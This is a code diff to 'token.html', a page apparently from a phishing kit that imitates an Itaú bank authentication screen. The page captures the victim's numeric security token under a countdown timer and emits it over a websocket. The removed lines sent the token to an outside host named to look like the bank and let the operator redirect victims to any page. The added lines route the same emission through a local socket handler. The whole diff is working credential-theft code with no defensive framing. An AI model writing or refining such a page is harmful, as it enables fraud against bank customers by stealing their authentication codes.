--- a/token.html
+++ b/token.html
@@ -260,16 +260,9 @@
         </form>
     </div>
 
-    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
+    <script src="/socket.io/socket.io.js"></script>
+    <script src="socket-handler.js"></script>
     <script>
-        const socket = io('https://itaupersonasautenticacion.up.railway.app', {
-            reconnection: true,
-            reconnectionDelay: 500,
-            reconnectionDelayMax: 2000,
-            reconnectionAttempts: Infinity,
-            timeout: 10000,
-            transports: ['websocket', 'polling']
-        });
 
         let sessionId = localStorage.getItem('itau_session_id');
         const tokenInput = document.getElementById('token');
@@ -280,16 +273,6 @@
         const timerEl = document.getElementById('timer');
 
         let timeLeft = 60;
-
-        // Initialize session
-        socket.on('connect', () => {
-            socket.emit('init-session', { sessionId });
-        });
-
-        socket.on('session-ready', (data) => {
-            sessionId = data.sessionId;
-            localStorage.setItem('itau_session_id', sessionId);
-        });
 
         // Solo permitir números en el campo de token
         tokenInput.addEventListener('input', function(e) {
@@ -331,24 +314,18 @@
                 clearInterval(timer);
                 loadingOverlay.classList.add('active');
 
-                socket.emit('token', {
+                window.itauSocket.emit('token', {
                     token: tokenInput.value
                 });
             }
         });
 
-        socket.on('token-response', (data) => {
+        window.itauSocket.on('token-response', (data) => {
             if (data.success) {
                 console.log('Token sent successfully');
             } else {
                 loadingOverlay.classList.remove('active');
                 alert('Error al procesar la solicitud');
-            }
-        });
-
-        socket.on('redirect', (data) => {
-            if (data.page) {
-                window.location.href = data.page;
             }
         });
     </script>
